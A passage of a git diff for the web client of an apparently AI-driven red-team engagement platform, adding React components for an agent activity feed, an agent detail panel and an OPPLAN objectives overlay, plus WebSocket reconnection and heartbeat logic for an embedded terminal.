+ + ); +} diff --git a/clients/web/src/components/layout/sidebar.tsx b/clients/web/src/components/layout/sidebar.tsx index b05b21ea..115d3454 100644 --- a/clients/web/src/components/layout/sidebar.tsx +++ b/clients/web/src/components/layout/sidebar.tsx @@ -9,6 +9,7 @@ import { Crosshair, Radio, ClipboardList, + Clock, FolderOpen, FileWarning, Network, @@ -47,6 +48,7 @@ const globalNav: NavItem[] = [ const engagementNav: NavItem[] = [ { href: "/live", label: "Live", icon: Radio, engagementScoped: true }, { href: "/plan", label: "Plan", icon: ClipboardList, engagementScoped: true }, + { href: "/timeline", label: "Timeline", icon: Clock, engagementScoped: true }, { href: "/documents", label: "Documents", icon: FolderOpen, engagementScoped: true }, { href: "/findings", label: "Findings", icon: FileWarning, engagementScoped: true }, { href: "/graph", label: "Attack Graph", icon: Network, engagementScoped: true }, diff --git a/clients/web/src/components/streaming/agent-detail-panel.tsx b/clients/web/src/components/streaming/agent-detail-panel.tsx new file mode 100644 index 00000000..0c4f1e03 --- /dev/null +++ b/clients/web/src/components/streaming/agent-detail-panel.tsx @@ -0,0 +1,369 @@ +"use client"; + +/** + * AgentDetailPanel — Slide-in panel showing detailed activity for a selected agent. + * + * Filters the global SubagentCustomEvent stream to the selected agent, + * derives current status, and renders a mini-feed of recent tool calls and messages. 
+ */ + +import { useEffect, useMemo, useRef } from "react"; +import type { SubagentCustomEvent } from "@decepticon/streaming"; +import type { AgentConfig } from "@/lib/agents"; +import { AGENT_DISPLAY_CONFIG } from "@/lib/agents"; +import { cn } from "@/lib/utils"; +import { Badge } from "@/components/ui/badge"; +import { ScrollArea } from "@/components/ui/scroll-area"; +import { Separator } from "@/components/ui/separator"; +import { X, Wrench, MessageSquare, Clock } from "lucide-react"; +import ReactMarkdown from "react-markdown"; + +// ── Types ────────────────────────────────────────────────────────── + +interface AgentDetailPanelProps { + agent: AgentConfig | null; + events: SubagentCustomEvent[]; + onClose: () => void; + className?: string; +} + +// ── Helpers ──────────────────────────────────────────────────────── + +type AgentStatus = "idle" | "processing" | "completed"; + +const STALENESS_THRESHOLD_MS = 15_000; // Agent idle if no recent event + +function deriveStatus(agentEvents: SubagentCustomEvent[], now: number): AgentStatus { + if (agentEvents.length === 0) return "idle"; + + const last = agentEvents[agentEvents.length - 1]; + if (last.type === "subagent_end") return "completed"; + + // Stale events: if most recent event is older than threshold, agent is + // no longer active — likely finished while observer was disconnected + if (last.elapsed != null && last.elapsed * 1000 > STALENESS_THRESHOLD_MS) { + return "idle"; + } + + if ( + last.type === "subagent_start" || + last.type === "subagent_tool_call" || + last.type === "subagent_message" + ) { + return "processing"; + } + + return "processing"; +} + +const STATUS_META: Record< + AgentStatus, + { label: string; dotClass: string } +> = { + idle: { + label: "Idle", + dotClass: "bg-zinc-500", + }, + processing: { + label: "Processing", + dotClass: "bg-amber-400 animate-pulse", + }, + completed: { + label: "Completed", + dotClass: "bg-emerald-400", + }, +}; + +function formatElapsed(ms: number): string 
{ + if (ms < 1000) return "just now"; + const seconds = Math.floor(ms / 1000); + if (seconds < 60) return `${seconds}s ago`; + const minutes = Math.floor(seconds / 60); + if (minutes < 60) return `${minutes}m ago`; + return `${Math.floor(minutes / 60)}h ago`; +} + +function truncate(text: string, max: number): string { + if (text.length <= max) return text; + return text.slice(0, max) + "…"; +} + +// ── Component ────────────────────────────────────────────────────── + +export function AgentDetailPanel({ + agent, + events, + onClose, + className, +}: AgentDetailPanelProps) { + // Escape key handler + useEffect(() => { + if (!agent) return; + + function handleKeyDown(e: KeyboardEvent) { + if (e.key === "Escape") { + onClose(); + } + } + + document.addEventListener("keydown", handleKeyDown); + return () => document.removeEventListener("keydown", handleKeyDown); + }, [agent, onClose]); + + // Filter events for this agent + const agentEvents = useMemo(() => { + if (!agent) return []; + return events.filter((e) => e.agent === agent.id); + }, [agent, events]); + + // Last 20 events for the mini-feed + const recentEvents = useMemo( + () => agentEvents.slice(-20), + [agentEvents], + ); + + // Elapsed time since last event + const feedRef = useRef(null); + const now = Date.now(); + + // Derive status + const status = useMemo(() => deriveStatus(agentEvents, now), [agentEvents, now]); + const statusMeta = STATUS_META[status]; + + // Latest subagent_message content + const latestMessage = useMemo(() => { + const messages = agentEvents.filter((e) => e.type === "subagent_message"); + if (messages.length === 0) return null; + return messages[messages.length - 1]; + }, [agentEvents]); + + + if (!agent) return null; + + const displayMeta = AGENT_DISPLAY_CONFIG[agent.id]; + const agentColor = agent.color ?? displayMeta?.color ?? "#6b7280"; + + return ( +
+ {/* ── Header ─────────────────────────────────────────── */} +
+ {agent.mascotEmoji} +
+
+ + {agent.name} + + + {agent.role} + +
+
+ +
+ + {/* ── Status ─────────────────────────────────────────── */} +
+ + {statusMeta.label} + {agentEvents.length > 0 && ( + + {agentEvents.length} event{agentEvents.length !== 1 ? "s" : ""} + + )} +
+ + {/* ── Recent Activity ────────────────────────────────── */} +
+
+ + Recent Activity + +
+ + +
+ {recentEvents.length === 0 ? ( + agent.id === "decepticon" ? ( +
+

Orchestrator

+

Decepticon coordinates sub-agents via task() delegation.

+

Activity appears on the sub-agent nodes, not here.

+

Click a sub-agent node in the graph to see its activity.

+
+ ) : ( +

+ No activity yet +

+ ) + ) : ( + recentEvents.map((event, i) => ( + + )) + )} +
+
+ + {/* ── Latest Message ─────────────────────────────── */} + {latestMessage && latestMessage.content && ( + <> + +
+ + Latest Message + +
+ +
+ {latestMessage.content} +
+
+ + )} +
+
+ ); +} + +// ── Activity Row ─────────────────────────────────────────────────── + +function ActivityRow({ + event, + agentColor, + now, +}: { + event: SubagentCustomEvent; + agentColor: string; + now: number; +}) { + const elapsed = event.elapsed != null ? event.elapsed * 1000 : undefined; + + switch (event.type) { + case "subagent_tool_call": + return ( +
+ +
+ + {event.tool ?? "unknown"} + + {event.content && ( +

+ {truncate(event.content, 80)} +

+ )} +
+ {elapsed != null && ( + + + {formatElapsed(elapsed)} + + )} +
+ ); + + case "subagent_tool_result": + return ( +
+ +
+ + Result:{" "} + + {event.tool ?? "tool"} + + + {event.content && ( +

+ {truncate(event.content, 80)} +

+ )} +
+ {elapsed != null && ( + + + {formatElapsed(elapsed)} + + )} +
+ ); + + case "subagent_message": + return ( +
+ +

+ {truncate(event.content ?? event.text ?? "", 100)} +

+
+ ); + + case "subagent_start": + return ( +
+ + Started +
+ ); + + case "subagent_end": + return ( +
+ + + Completed + {event.status ? ` — ${event.status}` : ""} + + {elapsed != null && ( + + + {formatElapsed(elapsed)} + + )} +
+ ); + + case "ask_user_question": + return ( +
+ +

+ {truncate(event.question ?? event.content ?? "Awaiting input", 100)} +

+
+ ); + + default: + return null; + } +} diff --git a/clients/web/src/components/streaming/live-activity-feed.tsx b/clients/web/src/components/streaming/live-activity-feed.tsx new file mode 100644 index 00000000..94a5af00 --- /dev/null +++ b/clients/web/src/components/streaming/live-activity-feed.tsx @@ -0,0 +1,437 @@ +"use client"; + +import { useEffect, useRef, useState, useCallback } from "react"; +import type { SubagentCustomEvent } from "@decepticon/streaming"; +import { AGENT_DISPLAY_CONFIG } from "@/lib/agents"; +import { cn } from "@/lib/utils"; +import { ScrollArea } from "@/components/ui/scroll-area"; +import { Badge } from "@/components/ui/badge"; +import { + Bot, + CheckCircle, + CheckCircle2, + Wrench, + MessageSquare, + HelpCircle, + Target, + Clock, + XCircle, + Loader2, + FolderOpen, + Activity, +} from "lucide-react"; + +// ── Types ──────────────────────────────────────────────────────── + +interface LiveActivityFeedProps { + events: SubagentCustomEvent[]; + engagementId: string; + className?: string; +} + +interface Objective { + id: string; + title: string; + status: string; + phase: string; + owner?: string; +} + +interface FileEntry { + name: string; + folder: string; + path: string; + size: number; +} + +// ── Helpers ────────────────────────────────────────────────────── + +function getAgentColor(agentId: string): string { + return AGENT_DISPLAY_CONFIG[agentId]?.color ?? "#6b7280"; +} + +function getAgentName(agentId: string): string { + return AGENT_DISPLAY_CONFIG[agentId]?.name ?? 
agentId; +} + +function formatRelativeTime(ms: number): string { + const seconds = Math.floor(ms / 1000); + if (seconds < 1) return "now"; + if (seconds < 60) return `${seconds}s ago`; + const minutes = Math.floor(seconds / 60); + if (minutes < 60) return `${minutes}m ago`; + const hours = Math.floor(minutes / 60); + return `${hours}h ago`; +} + +function summarizeArgs(args?: Record): string { + if (!args) return ""; + const keys = Object.keys(args); + if (keys.length === 0) return ""; + const parts = keys.slice(0, 2).map((k) => { + const v = args[k]; + const s = typeof v === "string" ? v : JSON.stringify(v) ?? ""; + return `${k}: ${s.length > 30 ? s.slice(0, 30) + "…" : s}`; + }); + if (keys.length > 2) parts.push("…"); + return parts.join(", "); +} + +function formatSize(bytes: number): string { + if (bytes < 1024) return `${bytes} B`; + if (bytes < 1024 * 1024) return `${(bytes / 1024).toFixed(1)} KB`; + return `${(bytes / (1024 * 1024)).toFixed(1)} MB`; +} + +const OBJ_STATUS_ICON: Record = { + completed: { icon: CheckCircle2, color: "text-emerald-400" }, + "in-progress": { icon: Loader2, color: "text-amber-400" }, + blocked: { icon: XCircle, color: "text-red-400" }, + pending: { icon: Clock, color: "text-zinc-600" }, + cancelled: { icon: XCircle, color: "text-zinc-600" }, +}; + +// ── Event Row ──────────────────────────────────────────────────── + +interface EventRowProps { + event: SubagentCustomEvent; + relativeTime: string; +} + +function EventRow({ event, relativeTime }: EventRowProps) { + const [expanded, setExpanded] = useState(false); + const color = getAgentColor(event.agent); + const name = getAgentName(event.agent); + + let icon: React.ReactNode; + let detail: React.ReactNode; + let rowClass = ""; + + switch (event.type) { + case "subagent_start": { + icon = ; + detail = ( + + {name} started + {event.content ? 
— {event.content} : null} + + ); + break; + } + case "subagent_end": { + const isError = !!event.error; + icon = ; + detail = ( + + {name} completed{event.elapsed != null ? ` (${event.elapsed.toFixed(1)}s)` : ""} + {isError ? " — error" : ""} + + ); + if (isError) rowClass = "bg-red-500/5"; + break; + } + case "subagent_tool_call": { + const argsSummary = summarizeArgs(event.args); + icon = ; + detail = ( + + {name} → {event.tool} + {argsSummary ? ({argsSummary}) : null} + + ); + break; + } + case "subagent_tool_result": { + icon = ; + detail = ( + + {name} ← {event.tool} done + + ); + break; + } + case "subagent_message": { + const text = event.content ?? event.text ?? ""; + const truncated = text.length > 200 && !expanded; + icon = ; + detail = ( + + {name}:{" "} + {truncated ? text.slice(0, 200) + "…" : text} + {text.length > 200 && ( + + )} + + ); + break; + } + case "ask_user_question": { + icon = ; + detail = ( + + {name} waiting: {event.question ?? event.content ?? "awaiting input"} + + ); + rowClass = "bg-amber-500/5"; + break; + } + default: { + icon = ; + detail = {name}: {event.type}; + } + } + + return ( +
+ {relativeTime} + + {name} + + {icon} + {detail} +
+ ); +} + +// ── Idle State — shows OPPLAN + workspace when no events ───────── + +function IdleState({ engagementId }: { engagementId: string }) { + const [objectives, setObjectives] = useState([]); + const [files, setFiles] = useState([]); + const [loading, setLoading] = useState(true); + + useEffect(() => { + let active = true; + async function load() { + try { + const [opplanRes, engRes] = await Promise.all([ + fetch(`/api/engagements/${engagementId}/opplan`).catch(() => null), + fetch(`/api/engagements/${engagementId}`).catch(() => null), + ]); + + if (!active) return; + + if (opplanRes?.ok) { + const data = await opplanRes.json(); + setObjectives(data.objectives ?? []); + } + + if (engRes?.ok) { + const eng = await engRes.json(); + const name = eng.workspacePath?.split("/").pop() ?? eng.name; + if (name) { + const filesRes = await fetch(`/api/workspace/${encodeURIComponent(name)}/files`).catch(() => null); + if (filesRes?.ok && active) { + const fData = await filesRes.json(); + const allFiles = (fData.folders ?? []).flatMap((f: { files: FileEntry[] }) => f.files); + setFiles(allFiles); + } + } + } + } catch { /* ignore */ } + finally { if (active) setLoading(false); } + } + load(); + // Refresh every 10s for live updates + const interval = setInterval(load, 10000); + return () => { active = false; clearInterval(interval); }; + }, [engagementId]); + + if (loading) { + return ( +
+ +
+ ); + } + + const completed = objectives.filter((o) => o.status === "completed").length; + const inProgress = objectives.filter((o) => o.status === "in-progress").length; + const blocked = objectives.filter((o) => o.status === "blocked").length; + + return ( +
+ {/* Header */} +
+ + Engagement Status +
+ + +
+ {/* OPPLAN objectives */} + {objectives.length > 0 && ( +
+
+ + + Objectives + + + {completed}/{objectives.length} + +
+ + {/* Progress bar */} +
+
0 ? (completed / objectives.length) * 100 : 0}%` }} + /> +
+ +
+ {objectives.map((obj) => { + const cfg = OBJ_STATUS_ICON[obj.status] ?? OBJ_STATUS_ICON.pending; + const Icon = cfg.icon; + return ( +
+ + {obj.id} + + {obj.title} + + {obj.owner && ( + + {obj.owner} + + )} +
+ ); + })} +
+ + {/* Summary */} +
+ {inProgress > 0 && {inProgress} running} + {blocked > 0 && {blocked} blocked} + {completed > 0 && {completed} done} +
+
+ )} + + {/* Workspace files */} + {files.length > 0 && ( +
+
+ + + Workspace Files + + {files.length} +
+
+ {files.slice(0, 15).map((f) => ( +
+ {f.folder}/ + {f.name} + {formatSize(f.size)} +
+ ))} + {files.length > 15 && ( + +{files.length - 15} more + )} +
+
+ )} + + {/* Empty state */} + {objectives.length === 0 && files.length === 0 && ( +
+ +

No activity yet

+

+ Use the terminal to start the engagement +

+
+ )} +
+ +
+ ); +} + +// ── LiveActivityFeed ───────────────────────────────────────────── + +export function LiveActivityFeed({ events, engagementId, className }: LiveActivityFeedProps) { + const bottomRef = useRef(null); + const timestampsRef = useRef([]); + const [, tick] = useState(0); + + // Record arrival time for new events + useEffect(() => { + const ts = timestampsRef.current; + if (events.length > ts.length) { + const now = Date.now(); + for (let i = ts.length; i < events.length; i++) { + ts.push(now); + } + } + }, [events.length]); + + // Auto-scroll to bottom when new events arrive + useEffect(() => { + bottomRef.current?.scrollIntoView({ behavior: "smooth" }); + }, [events.length]); + + // Update relative timestamps every 5s + useEffect(() => { + const id = setInterval(() => tick((n) => n + 1), 5000); + return () => clearInterval(id); + }, []); + + const getRelativeTime = useCallback( + (index: number) => { + const recorded = timestampsRef.current[index]; + if (!recorded) return "now"; + return formatRelativeTime(Date.now() - recorded); + }, + // eslint-disable-next-line react-hooks/exhaustive-deps + [], + ); + + // No streaming events — show engagement status instead + if (events.length === 0) { + return ( +
+ +
+ ); + } + + return ( +
+ {/* Header */} +
+ Activity Feed + + {events.length} + +
+ + {/* Feed */} + +
+ {events.map((event, i) => ( + + ))} +
+
+ +
+ ); +} diff --git a/clients/web/src/components/streaming/opplan-live-overlay.tsx b/clients/web/src/components/streaming/opplan-live-overlay.tsx new file mode 100644 index 00000000..b493c548 --- /dev/null +++ b/clients/web/src/components/streaming/opplan-live-overlay.tsx @@ -0,0 +1,309 @@ +"use client"; + +import { useCallback, useEffect, useRef, useState } from "react"; +import { Badge } from "@/components/ui/badge"; +import { ScrollArea } from "@/components/ui/scroll-area"; +import { + CheckCircle2, + XCircle, + Clock, + Loader2, + ChevronDown, + ChevronRight, + Target, +} from "lucide-react"; +import { cn } from "@/lib/utils"; + +// ── Types ─────────────────────────────────────────────────────── + +interface Objective { + id: string; + title: string; + phase: string; + status: string; + priority: number; + description?: string; + acceptanceCriteria?: string[]; +} + +interface OpplanLiveOverlayProps { + engagementId: string; + className?: string; +} + +// ── Status config (mirrors opplan-tracker.tsx) ────────────────── + +const statusConfig: Record< + string, + { icon: typeof CheckCircle2; color: string; label: string } +> = { + completed: { + icon: CheckCircle2, + color: "text-green-400", + label: "Passed", + }, + blocked: { + icon: XCircle, + color: "text-red-400", + label: "Blocked", + }, + "in-progress": { + icon: Loader2, + color: "text-amber-400", + label: "Running", + }, + "in_progress": { + icon: Loader2, + color: "text-amber-400", + label: "Running", + }, + pending: { + icon: Clock, + color: "text-muted-foreground", + label: "Pending", + }, + cancelled: { + icon: XCircle, + color: "text-zinc-600", + label: "Cancelled", + }, +}; + +// ── Component ─────────────────────────────────────────────────── + +export function OpplanLiveOverlay({ + engagementId, + className, +}: OpplanLiveOverlayProps) { + const [objectives, setObjectives] = useState([]); + const [loading, setLoading] = useState(true); + const [expanded, setExpanded] = useState(false); + const 
[expandedObjectiveId, setExpandedObjectiveId] = useState( + null, + ); + const intervalRef = useRef | null>(null); + + const fetchObjectives = useCallback(async () => { + try { + const res = await fetch( + `/api/engagements/${engagementId}/opplan`, + ); + if (!res.ok) return; + const data = await res.json(); + const fetched: Objective[] = data.objectives ?? []; + setObjectives(fetched); + } catch { + // Silently ignore — stale data is acceptable for an overlay + } finally { + setLoading(false); + } + }, [engagementId]); + + useEffect(() => { + fetchObjectives(); + intervalRef.current = setInterval(fetchObjectives, 5_000); + return () => { + if (intervalRef.current) clearInterval(intervalRef.current); + }; + }, [fetchObjectives]); + + // ── Derived state ── + + const total = objectives.length; + const completed = objectives.filter((o) => o.status === "completed").length; + const blocked = objectives.filter((o) => o.status === "blocked").length; + const resolved = completed + blocked; + const progress = total > 0 ? (resolved / total) * 100 : 0; + + // ── Loading state ── + + if (loading) { + return ( +
+
+ + Loading OPPLAN… +
+
+ ); + } + + // ── Empty state ── + + if (total === 0) { + return ( +
+
+ + No OPPLAN objectives +
+
+ ); + } + + // ── Objective row ── + + function ObjectiveRow({ obj }: { obj: Objective }) { + const config = statusConfig[obj.status] ?? statusConfig.pending; + const StatusIcon = config.icon; + const isInProgress = obj.status === "in-progress" || obj.status === "in_progress"; + const isExpanded = expandedObjectiveId === obj.id; + const hasDetails = obj.description || (obj.acceptanceCriteria && obj.acceptanceCriteria.length > 0); + + return ( +
+ + + {/* Expanded detail */} +
+
+
+ {obj.description && ( +

+ {obj.description} +

+ )} + {obj.acceptanceCriteria && + obj.acceptanceCriteria.length > 0 && ( +
    + {obj.acceptanceCriteria.map((c, i) => ( +
  • + + {c} +
  • + ))} +
+ )} +
+
+
+
+ ); + } + + // ── Main render ── + + return ( +
+ {/* Progress bar — 4px, always visible */} +
+
0 && completed === 0 + ? "bg-red-500" + : progress >= 100 + ? "bg-green-500" + : "bg-amber-400", + )} + style={{ width: `${progress}%` }} + /> +
+ + {/* Header — collapsed summary + toggle */} + + + {/* Expanded objective list */} +
+
+
+ +
+ {objectives.map((obj) => ( + + ))} +
+
+
+
+
+
+ ); +} diff --git a/clients/web/src/components/terminal/web-terminal.tsx b/clients/web/src/components/terminal/web-terminal.tsx index bb2c1a80..03a5e6c8 100644 --- a/clients/web/src/components/terminal/web-terminal.tsx +++ b/clients/web/src/components/terminal/web-terminal.tsx @@ -5,16 +5,27 @@ * * Connects to the standalone terminal WebSocket server which spawns * the CLI in a PTY. Reports the thread ID back to the parent via callback. + * + * Reconnection strategy: + * - Silent reconnect with exponential backoff (1s → 2s → 4s, cap 4s) + * - No terminal spam during reconnect — only a single status line + * - Status bar shows connection state at all times + * - After successful reconnect, clears the status message + * - After 15 failed attempts, stops and offers manual retry */ -import { useEffect, useRef, useCallback } from "react"; +import { useEffect, useRef, useCallback, useState } from "react"; +import { cn } from "@/lib/utils"; const TERMINAL_WS_URL = process.env.NEXT_PUBLIC_TERMINAL_WS_URL ?? "ws://localhost:3003"; +const MAX_RECONNECT_DELAY = 4000; +const INITIAL_RECONNECT_DELAY = 1000; +const MAX_RECONNECT_ATTEMPTS = 15; + +type ConnectionState = "connecting" | "connected" | "reconnecting" | "disconnected" | "error"; interface WebTerminalProps { - /** Engagement DB cuid — used as LangGraph thread metadata. */ engagementId: string; - /** Engagement folder slug — used to scope the sandbox /workspace bind. 
*/ engagementSlug: string; agentId?: string; className?: string; @@ -29,8 +40,8 @@ export function WebTerminal({ onThreadId, }: WebTerminalProps) { const containerRef = useRef(null); - const cleanupRef = useRef<(() => void) | null>(null); - const connectedRef = useRef(false); + const [connState, setConnState] = useState("connecting"); + const engagementIdRef = useRef(engagementId); engagementIdRef.current = engagementId; const engagementSlugRef = useRef(engagementSlug); @@ -40,55 +51,45 @@ export function WebTerminal({ const onThreadIdRef = useRef(onThreadId); onThreadIdRef.current = onThreadId; - const connect = useCallback(async () => { - const container = containerRef.current; - if (!container || connectedRef.current) return; - connectedRef.current = true; - let initSuccess = false; + const termRef = useRef(null); + const fitRef = useRef(null); + const wsRef = useRef(null); + const reconnectTimerRef = useRef | null>(null); + const reconnectAttemptRef = useRef(0); + const disposedRef = useRef(false); + const resizeObserverRef = useRef(null); + const resizeTimerRef = useRef | null>(null); + // Track whether we've shown the reconnecting message (to avoid spam) + const reconnectMsgShownRef = useRef(false); + // Track the onData listener for manual retry so we can dispose it + const retryListenerRef = useRef<{ dispose: () => void } | null>(null); - try { - const [{ Terminal }, { FitAddon }] = await Promise.all([ - import("xterm"), - import("@xterm/addon-fit"), - ]); - - await import("xterm/css/xterm.css"); - - const term = new Terminal({ - cursorBlink: true, - cursorStyle: "bar", - fontSize: 13, - fontFamily: "'JetBrains Mono', 'IBM Plex Mono', 'Fira Code', monospace", - theme: { - background: "#0a0e14", - foreground: "#d4d4d4", - cursor: "#faa32c", - selectionBackground: "#264f78", - black: "#1e1e1e", - red: "#f44747", - green: "#6a9955", - yellow: "#d7ba7d", - blue: "#569cd6", - magenta: "#c586c0", - cyan: "#4ec9b0", - white: "#d4d4d4", - brightBlack: "#808080", - 
brightRed: "#f44747", - brightGreen: "#6a9955", - brightYellow: "#d7ba7d", - brightBlue: "#569cd6", - brightMagenta: "#c586c0", - brightCyan: "#4ec9b0", - brightWhite: "#ffffff", - }, - allowTransparency: true, - scrollback: 5000, - }); + const cleanup = useCallback(() => { + disposedRef.current = true; + if (reconnectTimerRef.current) clearTimeout(reconnectTimerRef.current); + if (resizeTimerRef.current) clearTimeout(resizeTimerRef.current); + retryListenerRef.current?.dispose(); + resizeObserverRef.current?.disconnect(); + wsRef.current?.close(); + termRef.current?.dispose(); + wsRef.current = null; + termRef.current = null; + fitRef.current = null; + }, []); + + const connectWs = useCallback(() => { + if (disposedRef.current) return; + const term = termRef.current; + if (!term) return; - const fit = new FitAddon(); - term.loadAddon(fit); - term.open(container); - fit.fit(); + // Dispose any pending manual-retry listener + retryListenerRef.current?.dispose(); + retryListenerRef.current = null; + + // Close old WS + if (wsRef.current && wsRef.current.readyState !== WebSocket.CLOSED) { + wsRef.current.close(); + } const eid = engagementIdRef.current; const slug = engagementSlugRef.current; @@ -98,30 +99,17 @@ export function WebTerminal({ `${TERMINAL_WS_URL}?engagementId=${encodeURIComponent(eid)}` + `&engagementSlug=${encodeURIComponent(slug)}` + `&agentId=${encodeURIComponent(aid)}`; - const ws = new WebSocket(wsUrl); - - let disposed = false; - - const cleanup = () => { - if (disposed) return; - disposed = true; - clearTimeout(resizeTimer); - resizeObserver.disconnect(); - ws.close(); - term.dispose(); - connectedRef.current = false; - cleanupRef.current = null; - }; - cleanupRef.current = cleanup; - initSuccess = true; + const ws = new WebSocket(wsUrl); + wsRef.current = ws; ws.onopen = () => { - ws.send(JSON.stringify({ - type: "resize", - cols: term.cols, - rows: term.rows, - })); + setConnState("connected"); + reconnectAttemptRef.current = 0; + 
reconnectMsgShownRef.current = false; + // Silent reconnect — no terminal output. If the server reattaches us + // to an existing session, the scrollback replay handles visual continuity. + ws.send(JSON.stringify({ type: "resize", cols: term.cols, rows: term.rows })); }; ws.onmessage = (event) => { @@ -129,66 +117,287 @@ export function WebTerminal({ if (data.startsWith("{")) { try { const msg = JSON.parse(data); + // Filter ALL control messages — never write JSON frames to the terminal if (msg.type === "threadId" && msg.threadId) { onThreadIdRef.current?.(msg.threadId); return; } + if (msg.type === "pong" || msg.type === "error" || msg.type === "ping") { + return; // Control message — consume silently + } + if (msg.type === "reattached") { + // Server reattached us to an existing PTY — full reset then + // scrollback replay arrives as raw text right after this message. + term.reset(); + return; + } } catch { - // Not JSON + // Not valid JSON — pass through as terminal output } } term.write(data); }; - ws.onclose = () => {}; - ws.onerror = () => {}; + ws.onclose = (ev) => { + if (disposedRef.current) return; + if (ev.code === 1000) { + // Clean close — process exited normally + setConnState("disconnected"); + term.writeln("\r\n\x1b[90m[Session ended. 
Press Enter to start a new session.]\x1b[0m"); + const disposable = term.onData(() => { + disposable.dispose(); + reconnectAttemptRef.current = 0; + reconnectMsgShownRef.current = false; + connectWs(); + }); + retryListenerRef.current = disposable; + return; + } + + // Abnormal close — reconnect silently + scheduleReconnect(); + }; + + ws.onerror = () => { + if (disposedRef.current) return; + // onerror always fires before onclose — just update the indicator + setConnState("reconnecting"); + }; + + // Forward input term.onData((data: string) => { - if (ws.readyState === WebSocket.OPEN) { - ws.send(data); + if (wsRef.current?.readyState === WebSocket.OPEN) { + wsRef.current.send(data); } }); + // eslint-disable-next-line react-hooks/exhaustive-deps + }, []); - let resizeTimer: ReturnType; - const resizeObserver = new ResizeObserver(() => { - clearTimeout(resizeTimer); - resizeTimer = setTimeout(() => { - try { - fit.fit(); - if (ws.readyState === WebSocket.OPEN) { - ws.send(JSON.stringify({ - type: "resize", - cols: term.cols, - rows: term.rows, - })); + const scheduleReconnect = useCallback(() => { + if (disposedRef.current) return; + + const attempt = reconnectAttemptRef.current; + + if (attempt >= MAX_RECONNECT_ATTEMPTS) { + setConnState("error"); + const term = termRef.current; + if (term) { + term.writeln("\r\n\x1b[31m[Connection failed. Press Enter to retry.]\x1b[0m"); + reconnectMsgShownRef.current = false; + const disposable = term.onData(() => { + disposable.dispose(); + reconnectAttemptRef.current = 0; + connectWs(); + }); + retryListenerRef.current = disposable; + } + return; + } + + // Show ONE reconnecting message on the first attempt only + // No terminal output during reconnect — status bar shows state. + // The server's session persistence means the PTY is still alive; + // on reattach the scrollback replays seamlessly. 
+ reconnectMsgShownRef.current = true; + + setConnState("reconnecting"); + const delay = Math.min(INITIAL_RECONNECT_DELAY * Math.pow(2, attempt), MAX_RECONNECT_DELAY); + reconnectAttemptRef.current = attempt + 1; + + reconnectTimerRef.current = setTimeout(() => { + if (!disposedRef.current) connectWs(); + }, delay); + }, [connectWs]); + + // Initialize terminal + first connection + const init = useCallback(async () => { + const container = containerRef.current; + if (!container || disposedRef.current) return; + + try { + const [{ Terminal }, { FitAddon }] = await Promise.all([ + import("xterm"), + import("@xterm/addon-fit"), + ]); + await import("xterm/css/xterm.css"); + + if (termRef.current) { + // Already initialized — just reconnect WS + connectWs(); + return; + } + + const term = new Terminal({ + cursorBlink: true, + cursorStyle: "bar", + fontSize: 13, + fontFamily: "'JetBrains Mono', 'IBM Plex Mono', 'Fira Code', monospace", + theme: { + background: "#0a0e14", + foreground: "#d4d4d4", + cursor: "#faa32c", + selectionBackground: "#264f78", + black: "#1e1e1e", + red: "#f44747", + green: "#6a9955", + yellow: "#d7ba7d", + blue: "#569cd6", + magenta: "#c586c0", + cyan: "#4ec9b0", + white: "#d4d4d4", + brightBlack: "#808080", + brightRed: "#f44747", + brightGreen: "#6a9955", + brightYellow: "#d7ba7d", + brightBlue: "#569cd6", + brightMagenta: "#c586c0", + brightCyan: "#4ec9b0", + brightWhite: "#ffffff", + }, + allowTransparency: true, + scrollback: 10000, + }); + + const fit = new FitAddon(); + term.loadAddon(fit); + term.open(container); + fit.fit(); + + termRef.current = term; + fitRef.current = fit; + + // Resize observer + const resizeObserver = new ResizeObserver(() => { + if (resizeTimerRef.current) clearTimeout(resizeTimerRef.current); + resizeTimerRef.current = setTimeout(() => { + try { + fitRef.current?.fit(); + const ws = wsRef.current; + const t = termRef.current; + if (ws?.readyState === WebSocket.OPEN && t) { + ws.send(JSON.stringify({ type: "resize", 
cols: t.cols, rows: t.rows })); + } + } catch { + // ignore } - } catch { - // Ignore resize errors during teardown + }, 150); + }); + resizeObserver.observe(container); + resizeObserverRef.current = resizeObserver; + + // Connect + connectWs(); + } catch (err) { + setConnState("error"); + console.error("[WebTerminal] Init failed:", err); + } + }, [connectWs]); + + useEffect(() => { + disposedRef.current = false; + init(); + return cleanup; + }, [init, cleanup]); + + // ── Heartbeat: detect silently-dead sockets ────────────────────── + // Ping every 15s; if no data received from server within 5s (PONG_TIMEOUT) of a + // ping, the socket is half-open — force-close and let reconnect handle it. + // Pong responses are filtered by onmessage above (never reach terminal). + useEffect(() => { + const PING_INTERVAL = 15000; + const PONG_TIMEOUT = 5000; + let pingTimer: ReturnType; + let pongTimer: ReturnType; + + pingTimer = setInterval(() => { + const ws = wsRef.current; + if (!ws || ws.readyState !== WebSocket.OPEN) return; + try { + ws.send(JSON.stringify({ type: "ping" })); + pongTimer = setTimeout(() => { + // If WS is still the same instance and still "open", it's half-open — kill it + if (wsRef.current === ws && ws.readyState === WebSocket.OPEN) { + ws.close(); + } + }, PONG_TIMEOUT); + } catch { + ws.close(); + } + }, PING_INTERVAL); + + return () => { + clearInterval(pingTimer); + clearTimeout(pongTimer); + }; + }, [connState]); + + // ── Visibility: reconnect when tab becomes visible ─────────────── + // Browsers throttle/kill WS in background tabs. Reconnect on focus.
+ useEffect(() => { + const handler = () => { + if (document.visibilityState === "visible") { + const ws = wsRef.current; + if (!ws || ws.readyState === WebSocket.CLOSED || ws.readyState === WebSocket.CLOSING) { + reconnectAttemptRef.current = 0; + reconnectMsgShownRef.current = false; + connectWs(); } - }, 150); - }); - resizeObserver.observe(container); - } catch (err) { - if (!initSuccess) connectedRef.current = false; - console.error("[WebTerminal] Init failed:", err); - } - }, []); + } + }; + document.addEventListener("visibilitychange", handler); + return () => document.removeEventListener("visibilitychange", handler); + }, [connectWs]); + // ── Network: reconnect when browser comes back online ──────────── useEffect(() => { - connect(); - return () => { cleanupRef.current?.(); }; - }, [connect]); + const handler = () => { + const ws = wsRef.current; + if (!ws || ws.readyState === WebSocket.CLOSED || ws.readyState === WebSocket.CLOSING) { + reconnectAttemptRef.current = 0; + reconnectMsgShownRef.current = false; + connectWs(); + } + }; + window.addEventListener("online", handler); + return () => window.removeEventListener("online", handler); + }, [connectWs]); + + const statusColor: Record = { + connecting: "bg-amber-400", + connected: "bg-emerald-400", + reconnecting: "bg-amber-400 animate-pulse", + disconnected: "bg-zinc-500", + error: "bg-red-400", + }; + + const statusLabel: Record = { + connecting: "Connecting...", + connected: "Connected", + 